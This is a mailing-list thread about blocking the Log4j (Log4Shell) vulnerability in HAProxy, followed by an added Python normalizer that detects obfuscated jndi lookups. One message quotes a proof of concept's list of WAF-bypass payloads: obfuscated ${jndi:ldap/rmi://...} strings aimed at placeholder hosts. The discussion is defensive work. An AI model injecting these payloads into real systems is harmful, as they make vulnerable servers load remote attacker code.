You should also take into account paths that can have a base64-encoded payload.

To me the best bet for protecting via HAProxy is using the SPOA mod_security WAF,
given people have already come up with comprehensive protection rules.


________________________________
From: Nicolas CARPi <nicola...@rpi.ooo>
Sent: Tuesday, 14 December 2021, 10:27
To: Jonathan Matthews
Cc: Olivier D; HAProxy
Subject: Re: Blocking log4j CVE with HAProxy

On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like "${j{$lower:N}di:ldap://...";.

Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

So if one can manage to match all of that, it could work.

Of course this block in the POC is immediately followed by:
Don't trust the web application firewall. ;)

[0]
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce#bypass-waf

Best,
~Nico
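Added example, not code from this thread, from HAProxy or from the linked POC: a small Python normalizer that collapses the obfuscation forms listed above (the `${::-x}`, `${lower:x}` and `${upper:x}` lookups) before checking for a `jndi:` lookup, and that also tries URL- and base64-decoded path/query segments for the base64-in-path case raised in the reply. Function names and sample inputs are mine, and modelling only those three lookup forms is an assumption.

```python
import base64
import binascii
import re
from urllib.parse import unquote

_INNER = re.compile(r"\$\{([^{}]*)\}")  # innermost lookup: no nested lookup inside
_OPEN, _CLOSE = "\x00", "\x01"            # stand-ins for the braces of lookups kept verbatim

def _resolve_inner(m: re.Match) -> str:
    """Resolve one innermost lookup to the text it would yield. Assumption: only
    the ${key:-default}, ${lower:x} and ${upper:x} forms seen in the thread are
    modelled; any other lookup (the jndi: one included) is kept verbatim."""
    body = m.group(1)
    if ":-" in body:
        key, default = body.split(":-", 1)
        if not key.lstrip(":").lower().startswith("jndi"):
            return default  # empty/unknown key yields its default: ${::-j} -> "j"
    elif body.lower().startswith("lower:"):
        return body[6:].lower()
    elif body.lower().startswith("upper:"):
        return body[6:].upper()
    return _OPEN + body + _CLOSE  # keep it, but stop the loop from re-matching it

def normalize_lookups(s: str) -> str:
    """Collapse innermost lookups until nothing changes, then restore the braces."""
    prev = None
    while prev != s:
        prev, s = s, _INNER.sub(_resolve_inner, s)
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")

def _candidate_texts(value: str):
    """Raw value, its URL-decoded form, and base64 decodings of path/query
    segments (constructed handling for the base64-in-path case)."""
    decoded = unquote(value)
    yield value
    yield decoded
    for seg in re.split(r"[/?&]", decoded):
        for cand in (seg, seg.partition("=")[2]):  # whole segment, or the value of name=value
            if len(cand) >= 8 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", cand):
                try:
                    yield base64.b64decode(cand, validate=True).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    pass

def looks_like_jndi_lookup(value: str) -> bool:
    """True if any decoding of the value normalizes to a ${jndi:...} lookup."""
    return any("${jndi:" in normalize_lookups(t).lower() for t in _candidate_texts(value))
```

The point is the order of operations: decode and normalize first, then match, since a pattern list applied to the raw request is exactly what the listed variants are built to slip past.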


